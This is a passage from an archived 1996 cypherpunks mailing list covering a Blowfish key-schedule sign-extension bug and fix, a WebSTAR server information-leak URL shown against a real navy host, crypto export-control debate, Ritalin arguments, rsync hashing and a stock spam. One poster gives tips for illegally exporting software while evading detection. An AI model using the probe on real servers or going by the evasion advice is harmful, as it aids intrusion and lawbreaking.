	unsigned long data;
	...
	j=0;
	...
		data=0;
		for(k=0;k<4;k++){
			data=(data<<8)|key[j];/* choke*/
			j+=1;
			if(j==keybytes)
				j=0;
		}
		...
}
 
It chokes whenever the most significant bit
of key[j] is a '1'.  For example, if key[j]=0x80,
key[j], a signed char, is sign extended to 0xffffff80 
before it is ORed with data.   For examle, when:
 
	(j&0x3)==0x3 (that is j=0x3,0x7,0xf, etc.) 
- -and-
	(key[j]&0x80)==0x80 (or when k[j]=0x80,0x81,etc.)
 
data=0xffffff80 (0xffffff81,etc.) upon exit from the 
above "for(k=...)" loop.  ORing all of these 1's into 
data effectively wipes out 3/4 of the key characters!  
(that is, 3/4 of the key characters are known to be 
set to 1 when the 4th key byte to be ORed into data 
has a 1 in the most significant bit.)  For a randomly 
selected 32-bit key, there is a 50% chance that 3/4 
of the key could be considered as all '1's, even if 
they weren't that way to begin with. 
 
This is obviously a security issue.  Note, contrary
to my previous statement, the key length in bytes
_does not_ need to be divisible by 4 to exploit this
implementation flaw.
 
The following fix has been verified to work:
 
	data<<=8;
	data|=(unsigned long)key[j]&0xff;
 
Another fix is to declare 'key' as 'unsigned char *'.
Other fixes are possible.
 
NOTE:  Most test vectors will not check for this bug 
       because they use keys comprised of ASCII 
       (value<0x80) strings.  This bug does not show
       up when every character in the key has a value
       less than 0x80.
 
This should be corrected and noted in the source code 
for blowfish.  
 
Also, test vectors with unsigned character values greater 
than 0x80 should be generated and published.
 
I did not notice this bug in the "Applied Cryptography"
errata.  It should be noted there, too.
 
This flaw may or may not be present in other implementations 
of the Blowfish algorithm.  Thanks to non-standard use of
the 'union' construct, I think others who use blowfish may
or may not have avoided this bug.  In cases where this bug
has been avoided, it may have been done purposefully or
inadvertantly.

Regards,
 
Mike Morgan, 			Hardware Engineer
Digi International, 		mmorgan@dgii.com
- --
I do not speak for my company in this post.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Jul 1996 14:29:06 +0800
To: "Mark M." <paul.elliott@hrnowl.lonestar.org>
Subject: Re: Can the inevitability of Software privacy be used to defeat the ITAR?
Message-ID: <199607112332.QAA09668@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:03 PM 7/11/96 -0400, Mark M. wrote:

>> What is to prevent a U.S company to licence a foreign company
>> to sublicence and distribute a Crypto product abroad, if that
>> foreign company obtains that product on the pirate market?
>
>Just because the company didn't break any laws doesn't mean that they aren't
>going to be harassed by the government.  This is similar to the Philip
>Zimmermann case.  A grand jury investigation could be carried on for as long
>as the statute of limitations dictates and then the prosecutor of the case
>decided at the last minute not to indict.  This is the reason that Netscape
>has not yet made a browser with 128-bit encryption available on the Internet.

I think the government's ability to "harass" writers of good crypto software 
has been severely limited by their failure to indict Zimmermann.  Remember, 
today they pretty much have to accept the fact that anybody can write any 
software, DOMESTICALLY, without any sort of legal impediment by the laws 
including ITAR.   This is particularly true of a company like Netscape, 
which presumably has the bucks and/or the political clout to make it a 
difficult target.  Any case against Netscape would probably take years if 
not decades to resolve, and long before this happened the world would have 
adopted good encryption regardless.

Look what happened when MIT put PGP on the Web:  "Nothing."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cyberdog <eric@clever.net>
Date: Fri, 12 Jul 1996 12:13:44 +0800
To: cypherpunks@toad.com
Subject: New Mac Web Server Security Hole Discovered
Message-ID: <v03007800ae0b14edb270@[204.249.244.13]>
MIME-Version: 1.0
Content-Type: text/plain


Try adding /M_A_C_H_T_T_P_V_E_R_S_I_O_N

to any of the URL's at

http://www.netcraft.co.uk/Survey/Reports/960701/ALL/WebSTAR.html

and each server will leak information like

---
http://europa.nadc.navy.mil//M_A_C_H_T_T_P_V_E_R_S_I_O_N
---
WebSTAR, Copyright (c)1995 Chuck Shotton,
Portions (c)1995 StarNine Technologies, Inc. and its Licensors. All rights
reserved.
PowerPC (CW) version

totalCon 343, maxCon 30, listening 29, current 1, high 8, busy 0, denied 0,
timeout 0, maxMem
1140640, currMem 1117024, minMem 1090208, bytesSent 1218888, port 80,
maxTimeout 300,
verboseMessages false, disableLogging false, hideWindow false,
refuseConnections false, upSince
07/11/96:10:48, version 1.2.5(PowerPC (CW))
--

Anyone can use this for denial of service becase this backdoor is so well
hidden it won't show up in the logs!

The vendor has not commited to an instant fix, but they have told their
users not to discuss this on public lists lest their obscurity become
unsecure.

p.s. The copyright part was their lawyer's idea!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Myers <blackavr@aa.net>
Date: Fri, 12 Jul 1996 18:38:50 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <2.2.32.19960712012906.006e6390@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:39 AM 7/9/96 -0500, Rick Smith wrote:
>erehwon@c2.org (William Knowles) writes:
>
>>Ritalin has been a godsend, I am able to dialin when I have to.
>>Ritalin is not the only drug for treating ADD, Prozac works for
>>some.
>
>I use coffee, or else I just managed to grow out of the worst effects.
>In any case, I drink more coffee than just about anyone I know, and it
>doesn't "wire" me at all.

Coffee usage seconded here...I've tapered down to about two pots or so
a day from four or more, due to the tolerance I was developing. It's
about the only thing that gets anything done on time.  While I can
understand and agree with Tim and Mike's points about government control
and "making creative people fit in", there is a point where creativity 
is the only thing possible, to the exclusion of all else, such as paying
bills on time, doing necessary work, or just interacting with others.
--
/^^^^^^^^^Instead of being born again, why not just GROW UP?^^^^^^^^^^^\
Michael Myers                   Vote Libertarian....you'll sleep better!
Don't like abortion? Don't have one.     Don't like guns? Don't buy one.
blackavr@aa.net                          E-mail for PGPv2.6.2 public key
\____________ http://www.aa.net/~blackavr/homepage.htm ________________/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 12 Jul 1996 18:45:41 +0800
To: "cypherpunks" <markm@voicenet.com>
Subject: Re: A case for 2560 bit keys
Message-ID: <199607120142.SAA19572@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 9 Jul 96 17:46:00 -0800, markm@voicenet.com wrote:

>> As an experiment generate a 2047 bit PGP key and a 512 bit PGP key.
>> Encrypt a file (preferably of a reasonable size) using both keys.
>> Depending on the computer you are using, the time difference between the
>> two keys will be a matter of few seconds or even a fraction of a second.
>
>Now try decrypting the file, or signing another file.  I have a 486-66 which
>is now considered hopelessly sluggish by today's standards.  It takes about
>5 seconds, while doing the same operation with a 512-bit key takes less than a
>second.  I sign every one of my messages, so such a time delay gets quite

check your setup. I used to run a 386-20 (5MB RAM) and it took about 3
seconds for a 1024 bit key. Given it didn't even have a copro (not sure
when/if PGP uses one) and that it was off of a Stackered drive, I'd
expect you to have much better times.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chag@moneyworld.com
Date: Fri, 12 Jul 1996 18:56:57 +0800
To: <cypherpunks@toad.com>
Subject: Chancellor Group (symbol = CHAG)
Message-ID: <199607120153.SAA16483@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


http://chancellor.stockpick.com

Chancellor Group, Inc. (symbol CHAG) just reported big quarterly earnings.
SGA Goldstar issued a "buy" recommendation.  I understand other investment
advisors are looking to recommend CHAG. The company has a strong book value.
The short sellers need to cover.  This looks like a good situation to me.
What do you think?  They are located at:

	http://chancellor.stockpick.com

Bob Williams, 206-269-0846 

To terminate from my Investment Opportunities, Reply to 
chag@moneyworld.com with "remove" in the subject field. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Yanni" <jon@aggroup.com>
Date: Fri, 12 Jul 1996 19:34:14 +0800
To: Cyberdog <cypherpunks@toad.com
Subject: Re: New Mac Web Server Security Hole Discovered
Message-ID: <9607111927.AA01556@jon.clearink.com>
MIME-Version: 1.0
Content-Type: text/plain


> Try adding /M_A_C_H_T_T_P_V_E_R_S_I_O_N

The simple ( unsupported ) fix is to change the strings (they show up
twice in the resources) with a resource editor such as resedit.

Regards,

-jon

Jon (no h) S. Stevens        yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
We are hiring!
http://www.clearink.com/clearink/home/job.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Jul 1996 19:52:05 +0800
To: cypherpunks@toad.com
Subject: Re: Can the inevitability of Software privacy be used to	  defeat the ITAR?
Message-ID: <ae0b08f5010210048875@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 7/12/96, jim bell wrote:

>Look what happened when MIT put PGP on the Web:  "Nothing."
>

Go back an read Hal Abelson's message of just a few days ago. MIT may lose
out on a large contract with Sandia becuase of their publishing of a _book_
containing PGP code.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Jul 1996 22:17:51 +0800
To: Will Rodger <cypherpunks@toad.com
Subject: Re: I@Week on crypto export loophole 6/24/96
Message-ID: <199607120403.VAA24122@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 7/11/96 -0400, Will Rodger wrote:

>Bidzos' pending deal brought forth several questions:
>1 - Could others try something like the DES deal with stuff under copyright
>and still make money doing it?
>2 - If so, was the administration aware of it? and;
>3 - Who, if anyone, would be the first to try it?
>
>The answers were:
>1 - Yes, someone else could try it.
>2- The administration wouldn't comment, but had an official reply that
>showed it grasped all the implications within 15 minutes of our asking.
>3 - No one's stepping forward, but Ken Bass, atty. for Phil Karn and Phil
>Zimmermann, among others, said he knew some folks were considering moves
>along those lines, though he gave few details.
>
>Steptoe & Johnson cyberspace atty. Stewart Baker suggested such a move would
>be "extremely aggressive advice," though "not quite insane." if I remember
>correctly.

Well, lawyers have to be really careful about appearing to endorse something 
that's on the edge of legality.  Also, it's obvious that the advice given 
would be vastly different depending on who was doing the asking.  If it were 
one of the two companies potentially involved, they'd probably be told that 
doing this would be frowned on.  If it were the individual considering 
secretly exporting the program, he'd be told "Don't tell us!  And whatever 
you do, don't get caught!"


>A few caveats to any US citizen who finds himself  trying to help such a
>situation occur:
>
>1) The loophole can be closed by executive order with little or no notice,

It's unclear if a foreign national on foreign soil can be considered within 
the jurisdiction of the US, especially merely for being the recipient of 
software whose export would have been illegal under US law.  If the copy is 
re-mailed to him from a third country, he doesn't even know for sure if the 
software was ever illegally exported.

And "executive orders" are already on constitutionally shaky ground anyway, 
as are export controls for crypto.  (As I understand it, "executive order" 
was originally considered binding only on government employees; it was akin 
to an order internal to a company.)  An executive order prohibiting a 
private-company's receipt of money for licensing fees on software which, IF 
EXPORTED, would require a license is straining credulity more than a bit.

And moreover, there's the question of whether or not this logic extends to 
any licensing regardless of how remote it is.  Could a US semiconductor 
company be barred from licensing ordinary semiconductor technology, if the 
foreign recipient of that license decides to use it for building an 
encryption chip?  What if they use it to build an ordinary DRAM chip that 
just happens to be installed into a crypto phone, perhaps by a third party?  
Could the writer of a C++ compiler be denied the right to export simply 
because one foreign customer used a copy of that program to compile an 
encryption program abroad?

And,  they should be able to turn the royalty payment into something that 
achieves the same payback (say, the use of a logo signifying approval) 
rather than the specific use of a particular piece of software.


 and
>2) Any citizen aiding the export of such software will of course, be brought
>up on some pretty serious felony charges if caught. Foreign nationals are
>doubtless subject to the same laws if on US soil while the deed gets done.

"Getting away with it" probably involves no more than writing a floppy with 
software, putting a few stamps on it and addressing it to a foreign country, 
putting either no return address or a fake one on it, and then tossing it in 
a convient USnail box.  (Taking all the usual precautions against 
fingerprints, DNA testing, etc.)  In practice, the likelihood of getting 
caught if you're careful is somewhere between zero and nil.  Pre-encrypting 
the data with the recipient's public key makes it that much more difficult 
for the USG to show that it's being illegally exported.


>Then again, Baker said, "if one gets away with it, dozens will try it, too."
>I won't be the first to try.

As I see it, the most important issue is not the legal status of the one 
actually doing the export/mailing, but in fact the organization which is the 
recipient and thus, the beneficiary of this act.  _THAT_ organization will 
be well-identified, yet will not have done anything obviously illegal.  Is 
there any indication that Baker was trying to distinguish between the one 
physically mailing it, and those receiving it?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Fri, 12 Jul 1996 20:06:21 +0800
To: cypherpunks@toad.com
Subject: I@Week on crypto export loophole 6/24/96 (was:Re: Can the inevitability of Software privacy be used to  defeat the ITAR?)
Message-ID: <1.5.4.32.19960712023018.00683a80@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>At 04:06 AM 7/11/96 +0000, Paul Elliott wrote:
>>What is to prevent a U.S company to licence a foreign company
>>to sublicence and distribute a Crypto product abroad, if that
>>foreign company obtains that product on the pirate market?
>>
>>I am not a lawyer, but I look at the definition of "export"
>>on page 612 of Applied Cryptography and nothing seems to
>>obviously apply.

Elliott appears to be absolutely correct.

Jim Bell replied:

>I raised this type of idea on CP, twice, and didn't hear a peep about it!  

You were ahead of your time, Jim.
There was a cover story peep about the idea in Interactive Week June 24, in
fact. The story followed Bidzos' announcement that NTT would soon be
producing 3-DES chips en masse.
It's at: http://www.zdnet.com/intweek/print/960624/cover/doc1.html

Bidzos' pending deal brought forth several questions:

1 - Could others try something like the DES deal with stuff under copyright
and still make money doing it?
2 - If so, was the administration aware of it? and;
3 - Who, if anyone, would be the first to try it?

The answers were:
1 - Yes, someone else could try it.
2- The administration wouldn't comment, but had an official reply that
showed it grasped all the implications within 15 minutes of our asking.
3 - No one's stepping forward, but Ken Bass, atty. for Phil Karn and Phil
Zimmermann, among others, said he knew some folks were considering moves
along those lines, though he gave few details.

Steptoe & Johnson cyberspace atty. Stewart Baker suggested such a move would
be "extremely aggressive advice," though "not quite insane." if I remember
correctly.

A few caveats to any US citizen who finds himself  trying to help such a
situation occur:

1) The loophole can be closed by executive order with little or no notice, and
2) Any citizen aiding the export of such software will of course, be brought
up on some pretty serious felony charges if caught. Foreign nationals are
doubtless subject to the same laws if on US soil while the deed gets done.

Then again, Baker said, "if one gets away with it, dozens will try it, too."

I won't be the first to try.

Will Rodger
Washington Bureau Chief
Interactive Week.






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeXiJUcByjT5n+LZAQFFEQgAxabELJIV0W5IQW8xBc2fNd/22sV4xlaw
KGMHK6waHIQcC12lKJ3Y2nx67kZQUXmlpf6Xu+CmI8wzE5CJPgHmaQCfa8XJxryK
PtJkSfCyn+EZvMMLAab3azaJkGAFfzLTOtfajRjAd0TSnmGCb5FRNc1sNZv5HXqO
VR3Hmy6xcA3bxtihaAyW71rK1HZ1yXMrbejMtT/MhYWRgtigQFktYnaWG8kn2LD0
m26QgEKNiOIg9qCI5fc1Ivq1jSLyZ9FYcbzwQidaqyJ6LxJNPjmPgoK6RK1V0UU7
7i1EoIJDhC8hadtz/BaFeXLPMD558D1mJySL/J39ySpDer3VitsUMg==
=5APc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Jul 1996 19:10:53 +0800
To: Will Rodger <cypherpunks@toad.com
Subject: Re: I@Week on crypto export loophole 6/24/96
Message-ID: <199607120544.WAA29691@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 7/11/96 -0400, Will Rodger wrote:

>>At 04:06 AM 7/11/96 +0000, Paul Elliott wrote:
>>>What is to prevent a U.S company to licence a foreign company
>>>to sublicence and distribute a Crypto product abroad, if that
>>>foreign company obtains that product on the pirate market?
>>>
>>>I am not a lawyer, but I look at the definition of "export"
>>>on page 612 of Applied Cryptography and nothing seems to
>>>obviously apply.
>
>Elliott appears to be absolutely correct.
>
>Jim Bell replied:
>>I raised this type of idea on CP, twice, and didn't hear a peep about it!  
>
>You were ahead of your time, Jim.
>There was a cover story peep about the idea in Interactive Week June 24, in
>fact. The story followed Bidzos' announcement that NTT would soon be
>producing 3-DES chips en masse.
>It's at: http://www.zdnet.com/intweek/print/960624/cover/doc1.html


I just read the article, and it's very interesting.  My first note on the 
subject was posted June 4, and follows below:   


At 10:54 AM 6/4/96 GMT, John Young wrote:
>Connecting Declan's three dots [...]: 
>   The New York Times, June 4, 1996, pp. D1, D4. 
>   Japanese Chips May Scramble U.S. Export Ban 
>   By John Markoff 
>   Washington, June 3 -- The Nippon Telegraph and Telephone 
>   Corporation has quietly begun selling a powerful data- 
>   scrambling chip set that is likely to undermine the Clinton 
>   Administration's efforts to restrict the export of the 
>   fundamental technology for protecting secrets and commerce 
>   in the information age. 

 
>   An executive at NTT America said that although there were 
>   no restrictions on the export of cryptographic hardware or 
>   software from Japan, his company was still anxious to 
>   obtain software from RSA Data to use in its chips. That 
>   software is still controlled by United States export law, 
>   he said. 


Maybe it's just me, but the solution to NTT's problem is obvious.  Even 
assuming that the export of this software would be against the law, why 
doesn't somebody simply violate that law?  RSA would publish that software, 
possibly encrypted with NTT's public key, on a public system protected 
against direct export.  "Somebody" would download it, write it to a floppy 
(taking care not to leave any fingerprints, and wetting both the stamp and 
the envelope with tap water, rather than licking them) and mail that floppy 
off to NTT in Japan.  (Naturally, you don't put a return address on that 
envelope.   The truly paranoid would first take that floppy to some store's 
PC section, and cross-load the data onto a floppy written by some other 
floppy drive.)

NTT finds that envelope in their mail, opens it, reads the floppy, decrypts 
the data, and say, "Wow!  It's the data we wanted to get!"  It verifies that 
the data is valid by emailing a copy back to RSA in America, who say, 
"Amazing!  Somebody has illegally exported our software!"

As far as I know, there is nothing wrong with NTT using this software even 
if it is assumed to have been exported illegally.  Obviously, NTT won't 
_ask_ for somebody to do this, because then the government will claim it was 
all a conspiracy, but that doesn't prevent NTT from being the beneficiary of 
somebody else's activities.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 12 Jul 1996 21:07:49 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607101459.KAA16411@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.93.960711224742.174B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jul 1996, Perry E. Metzger wrote:
> "Clay Olbon II" writes:
> > While it is crucial for an adult to be able to function and maintain a job,
> > is it really as important for a kid to be able to sit still in school?  
> If he or she is going to learn anything, it is important to be able to
> pay attention, yes.

     If they were teaching anything, I bet the kid _would_ sit still. 
I sure would have been a lot less distracted.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 12 Jul 1996 18:41:23 +0800
To: Michael Helm <mike@fionn.lbl.gov>
Subject: Re: "White 'Punks on Dope" (w apologies to The Tubes)
In-Reply-To: <199607111723.KAA29657@fionn.lbl.gov>
Message-ID: <Pine.LNX.3.93.960711231117.174E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jul 1996, Michael Helm wrote:
> Ritalin or other drugs, their benefits & their costs, but this straw
> man is just ridiculous, & betrays the author's lack of knowledge.
> Unfortunately a similar misunderstanding is reflected in the writings
> of 1 or 2 others on this topic too.


> Parental (or other) control is not at issue at all with add; self
> control is the main problem.

     No, the POINT IS MIS-DIAGNOSIS. Children who are either brighter 
than their classmates and figured out the assignement with in minutes 
of the teacher giving it, or children with _no_ boundries implemented 
by their parents (people are like fractals, very subject to initial 
conditions) hence they keep pushing and pushing so the parents respond
by instituting chemical control.

     Most of the people who are arguing "against" ritilan ADMIT there 
are (or might be) some cases where certain chemicals are the way to go, 
but we feel that there are FAR to many cases out there. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 12 Jul 1996 18:32:53 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607120448.AAA02773@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.93.960711231901.174F-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jul 1996, Perry E. Metzger wrote:

> snow writes:
> > On Wed, 10 Jul 1996, Perry E. Metzger wrote:
> > > "Clay Olbon II" writes:
> > > > While it is crucial for an adult to be able to function and maintain a jo
> b,
> > > > is it really as important for a kid to be able to sit still in school?  
> > > If he or she is going to learn anything, it is important to be able to
> > > pay attention, yes.
> > If they were teaching anything, I bet the kid _would_ sit still. 
> I doubt it.

     Let me put that another way. Be much more attentive.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 12 Jul 1996 20:32:08 +0800
To: cypherpunks@toad.com
Subject: HotWired -- "A Browne Study"
Message-ID: <v0151010eae0b85682ff2@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





Date: Thu, 11 Jul 1996 12:10:44 -0500
To: fight-censorship+@andrew.cmu.edu
From: declan@well.com (Declan McCullagh)
Subject: HotWired -- "A Browne Study"

When Harry Browne was in my office for an interview on Tuesday, he talked a
good line, stressing his unabashed support for free speech (online and
offline) and government nonintervention in crypto. Read the full article in
today's HW/Netizen at the URL below for details...

Also in today's Netizen, John Heilemann reports on how "wired" Dick Lamm
is, saying that as long as Lamm's politics are in touch with the future,
it's good for the Net:

  http://www.hotwired.com/netizen/96/28/index3a.html

I happen to disagree; I think that if a candidate for president wants to
portray himself as "wired," he should venture into c-space himself. At
least we know Browne's cyber-clueful -- after all, he told me he bookmarked
HotWired. :)

-Declan

---

HotWired, The Netizen
http://www.hotwired.com/netizen/96/28/campaign_dispatch3a.html

"A Browne Study"
Campaign Dispatch

by Declan McCullagh
Washington, DC, 10 July

   The newly anointed Libertarian candidate for president dropped by
   HotWired's Washington bureau yesterday. With netizens appropriately
   regulation-shy after the Communications Decency Act brouhaha, the
   White House's Clipper III proposal, and calls from the Justice
   Department for a new cabinet-level agency to rein in the Net, it was
   clear the guy knows how to woo online voters.

   "Can you imagine if I got to the debates, and I made Bill Clinton and
   Bob Dole justify censoring the Internet - made them justify their
   blatant disregard for the First Amendment of the Constitution?" Harry
   Browne asked.

   No doubt about it, the Libertarian party has its flaws - little
   things, like that they'd gut environmental laws and auction off
   America's national parks and wildlife refuges if given half a chance.
   But it's also pretty obvious that this is the only party that actually
   understands the Net.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 12 Jul 1996 20:28:31 +0800
To: wprice@primenet.com
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
Message-ID: <960711234718_236000855@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


if anyone knows the site address and file name.please let me know =-}
Thanks
Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 12 Jul 1996 19:40:39 +0800
To: cypherpunks@toad.com
Subject: Re: rsync and md4
Message-ID: <199607120654.XAA19128@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:05 AM 7/1/96 -0400, "David F. Ogren" <ogren@cris.com> wrote:
>Irregardless, this argument is moot.  This thread is titled "rsync and 
>md4".  It is a discussion about which hash function suits this particular 
>purpose and he is not particularly concerned with resistance to deliberate 
>attack.  In this case MD4 will function adequately.

There are three issues with MD4/5 relevant to rsync
1) Collision probability - if you're concerned that a damaged packet
will have the same hash as the original correct packet, that's 2^-128.
If you're concerned that you may find a damaged packet with the same
hash as _some_ correct packet out there, that's a birthday problem,
and approaches 2^-64 if you've really got lots of packets that you
can keep track of at once, but in reality the probability is much lower
since you won't be keeping 2^64 packets around to collide with.

2) Deliberate collisions, and 3) speed - If I understand the description
of rsync, it needs a checksum to detect packets with different values
so it can determine whether to send an update packet.  It's concerned with
people changing _data_ in non-malicious ways that you want to detect,
so the security issues about MD4 and MD5 aren't relevant, though 
systematic changes to data resonating with the hash function are.
You can use _much_ simpler hash functions than MD5 - go check out a book
on error correcting codes and related math.  Most error detection 
applications these days use 32-bit polynomials, since they're good detectors
and can be implemented very efficiently on 32-bit hardware.  They're
useless for security, since you can invert them, but that's irrelevant.
If that's not reliable enough for you (and it may not be), 
there are polymomials in lengths like 64 bits or 128 bits that should
have good change detection, not be too sensitive to patterns in data, 
and be _far_ faster than MD4 or MD5.  

If I remember right, rsync was looking at using 16- and 32-bit checksums
to get a quick probable result and MD4 as a backup; you can save yourself
work by just calculating the 128-bit function and using the first 32 bits
as a quick check.  If you're _sure_ you're not worried about birthday
problems in your collisions, a 64-bit checksum is fine,
and will be even faster.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Re-delegate Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Jul 1996 19:54:39 +0800
To: cypherpunks@toad.com
Subject: Destabilizing China's Government with Strong Crypto
Message-ID: <ae0b470f030210041fb1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:40 AM 7/12/96, Arun Mehta wrote:
...
>2) Encourage the production of simple, cheap devices such as a PGP phone
>that they can manufacture in Hongkong and other parts of China, which will
>allow secure communications. Basically, people without a computer, Internet
>connection or sufficient literacy should be able to use effective
>encryption. Cheap.
>
>3) Find people who beam radio transmissions into China (Rupert Murdoch via
>his Star TV satellite is one ;-) and ask them to devote an "Internet hour"
>in which people can mail or phone in messages (via remailers and encryption
>too) to be broadcast. The whole thing can be automated, and  *everybody* has
>access to radio. More on this subject later.

Good ideas, all. And deploying steganography is a natural fit to this situation.

And this is yet another example of the negative effects of the U.S.
restrictions on crypto export: where widespread crypto tools might be used
to destabilize repressive governments, the lack of these tools integrated
into common applications makes it harder for freedom-fighters in China,
Burma, Iran, France, etc., to use them.

I often think the American CIA and NSA are actually just enforcers of the
status quo, preferring a New World Order of crypto-restricted citizen-units
to a more diverse, anarchic world in which private citizens and
corporations can thwart the desires of central governments.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 13 Jul 1996 09:20:34 +0800
To: Chris Adams <adamsc@io-online.com>
Subject: Re: A case for 2560 bit keys
In-Reply-To: <199607120202.WAA10180@quasar.voicenet.com>
Message-ID: <Pine.LNX.3.94.960712002056.258A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 11 Jul 1996, Chris Adams wrote:

> check your setup. I used to run a 386-20 (5MB RAM) and it took about 3
> seconds for a 1024 bit key. Given it didn't even have a copro (not sure
> when/if PGP uses one) and that it was off of a Stackered drive, I'd
> expect you to have much better times.

That's consistent with the timings I've been getting.  It should take about
9 seconds to decrypt an arbitrary message with a 2048-bit key with the setup
you describe.  Of course, I usually use X, so that probably does throw off
the timings a bit.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeXTXLZc+sv5siulAQEnAAP8Dbr/WWFKDhD0CRPePVtF2o7386Na89Xd
GUC7D2x9hFAcMS+YynQnLpNULHWY4e/ziY3GkpFVydSYrQfIZ7Xj8P7RPgFUmWnz
4Zo5zTIJif1jigWEmMqAr7nMBtDCFTJrB0ogD7ZlGcALHxjUKW7j20QtHyIg5/sr
nS7OAI2gZgc=
=/LMb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Jul 1996 21:18:11 +0800
To: snow <snow@smoke.suba.com>
